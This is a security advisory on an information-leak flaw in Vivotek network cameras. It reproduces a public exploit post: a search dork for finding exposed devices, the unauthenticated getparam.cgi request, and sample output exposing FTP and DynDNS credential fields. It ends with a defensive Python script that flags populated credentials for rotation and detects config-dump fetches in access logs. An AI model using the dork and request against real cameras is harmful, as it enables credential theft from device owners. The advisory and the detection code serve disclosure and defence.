Release date:
Updated on:
Affected Systems:
Vivotek Network Cameras
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54476
Vivotek is a provider of Network Video Solutions.
Vivotek Network Camera has the information leakage vulnerability. After successful exploitation, attackers can access sensitive information remotely.
Source: GothicX
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users act at their own risk!
GothicX provides the following test method:
# Exploit Title: Vivotek Full Data Source CONFIG
# Date: 09/07/12
# Author: Alejandro Leon Morales [GothicX]
# Author Mail: Gothicx [at] freaknetwork [dot] in
# Author Web: www.undermx.blogspot.mx
# Software web: www.vivotek.com
# Vulnerable version: all
# Tested on: Microsoft windows 7/Vista/XP/MacOS
# Dork: "/setup/config.html" | allinurl: "setup/parafile.html"
[PoC]
http://www.example.com/cgi-bin/admin/getparam.cgi
[Sensitive info]
ACCOUNT FTP
ACCOUNT DYNDNS
[Result]
ddns_enable='1'
ddns_provider='dyndnsdynamic'
ddns_Safe100_hostname=''
ddns_Safe100_usernameemail=''
ddns_Safe100_passwordkey=''
ddns_DyndnsDynamic_hostname='hostname'
ddns_DyndnsDynamic_usernameemail='usernameemail'
ddns_DyndnsDynamic_passwordkey='passwordkey'
ddns_DyndnsCustom_hostname=''
ddns_DyndnsCustom_usernameemail=''
ddns_DyndnsCustom_passwordkey=''
ddns_TZO_hostname=''
ddns_TZO_usernameemail=''
ddns_TZO_passwordkey=''
ddns_DHS_hostname=''
ddns_DHS_usernameemail=''
ddns_DHS_passwordkey=''
ddns_DynInterfree_hostname=''
ddns_DynInterfree_usernameemail=''
ddns_DynInterfree_passwordkey=''
ddns_CustomSafe100_hostname=''
ddns_CustomSafe100_usernameemail=''
ddns_CustomSafe100_passwordkey=''
ddns_CustomSafe100_servername=''
server_i0_type='ftp'
server_i0_http_url='http://'
server_i0_http_username=''
server_i0_http_passwd=''
server_i0_ftp_address='ftpaddress'
server_i0_ftp_username='ftpusername'
server_i0_ftp_passwd='ftppasswd'
server_i0_ftp_port='21'
server_i0_ftp_passive='1'
server_i0_ftp_location='\temp\record'
----------------------------------------------------------------------------------------------------
[Sensitive data]
FTP account:
server_i0_ftp_address='ftpaddress'
server_i0_ftp_username='ftpusername'
server_i0_ftp_passwd='ftppasswd'
DynDNS account:
ddns_DyndnsDynamic_hostname='hostname'
ddns_DyndnsDynamic_usernameemail='usernameemail'
ddns_DyndnsDynamic_passwordkey='passwordkey'
//******************************************************************************//
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Vivotek
-------
Currently, the vendor does not provide a patch or upgrade program. We recommend that users of this software watch the vendor's homepage for the latest version:
http://ebdemo.8800.org:17151/
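The following is an added example, not part of the advisory or of GothicX's post, written from the responder's side. Because no vendor patch is available, the owner of an exposed camera needs two things: a list of which credentials in the camera's configuration are actually populated (and so must be rotated) and a way to spot successful requests to the getparam.cgi path in web or proxy access logs. The script parses a configuration dump in the key='value' format shown above and pairs each populated password field with its account name and endpoint without echoing the secret itself. The sample dump and the access-log lines are constructed placeholders; the key-suffix conventions (_passwd, _passwordkey, _username, _usernameemail, _address, _hostname) are taken from the parameter names visible in the dump.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample dump in the key='value' format shown in the advisory.
# Every value here is a placeholder, not data from any real device.
SAMPLE_DUMP = """\
ddns_enable='1'
ddns_provider='dyndnsdynamic'
ddns_Safe100_hostname=''
ddns_Safe100_usernameemail=''
ddns_Safe100_passwordkey=''
ddns_DyndnsDynamic_hostname='cam01.example.invalid'
ddns_DyndnsDynamic_usernameemail='camuser'
ddns_DyndnsDynamic_passwordkey='PLACEHOLDER-ddns'
server_i0_type='ftp'
server_i0_http_url='http://'
server_i0_http_username=''
server_i0_http_passwd=''
server_i0_ftp_address='ftp.example.invalid'
server_i0_ftp_username='camupload'
server_i0_ftp_passwd='PLACEHOLDER-ftp'
server_i0_ftp_port='21'
"""

# One parameter per line: name, '=', single-quoted value.
LINE_RE = re.compile(r"^\s*([A-Za-z0-9_]+)\s*=\s*'(.*)'\s*$")

# Suffixes that mark a parameter as a secret in the dump format above.
SECRET_SUFFIXES = ("_passwd", "_passwordkey")


def parse_dump(text: str) -> Dict[str, str]:
    """Turn a getparam.cgi-style dump into an ordered name -> value mapping."""
    params: Dict[str, str] = {}
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if match:
            params[match.group(1)] = match.group(2)
    return params


def exposed_credentials(params: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (secret_key, account, endpoint) for every populated secret.

    The secret value is deliberately not returned: the responder needs to
    know which account to rotate, not to copy the password into a ticket.
    """
    found = []
    for key, value in params.items():
        suffix = next((s for s in SECRET_SUFFIXES if key.endswith(s)), None)
        if suffix is None or value == "":
            continue  # not a secret, or the slot is unused on this camera
        prefix = key[: -len(suffix)]
        account = (params.get(prefix + "_username")
                   or params.get(prefix + "_usernameemail") or "")
        endpoint = (params.get(prefix + "_address")
                    or params.get(prefix + "_hostname")
                    or params.get(prefix + "_url") or "")
        found.append((key, account, endpoint))
    return found


# Constructed access-log lines in common log format (placeholder addresses).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [09/Jul/2012:10:14:02 +0000] "GET /cgi-bin/admin/getparam.cgi HTTP/1.1" 200 4096',
    '198.51.100.3 - - [09/Jul/2012:10:15:11 +0000] "GET /setup/config.html HTTP/1.1" 200 1820',
    '203.0.113.7 - - [09/Jul/2012:10:15:40 +0000] "GET /cgi-bin/viewer/video.jpg HTTP/1.1" 200 51200',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
CONFIG_DUMP_PATH = "/cgi-bin/admin/getparam.cgi"


def config_dump_requests(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client_ip, path) for each successful fetch of the config path."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, _method, path, status = match.groups()
        if path.startswith(CONFIG_DUMP_PATH) and status == "200":
            hits.append((ip, path))
    return hits


if __name__ == "__main__":
    for key, account, endpoint in exposed_credentials(parse_dump(SAMPLE_DUMP)):
        print(f"rotate: {key} (account={account!r}, endpoint={endpoint!r})")
    for ip, path in config_dump_requests(SAMPLE_ACCESS_LOG):
        print(f"config dump fetched by {ip}: {path}")
```

The pairing logic strips the secret suffix and looks up sibling parameters with the same prefix, so it covers every DDNS provider block and every server_iN block in the dump without a hard-coded list of providers. A 200 status on the config path is the signal that matters in the log check; a 401 would mean the camera's authentication stopped the request.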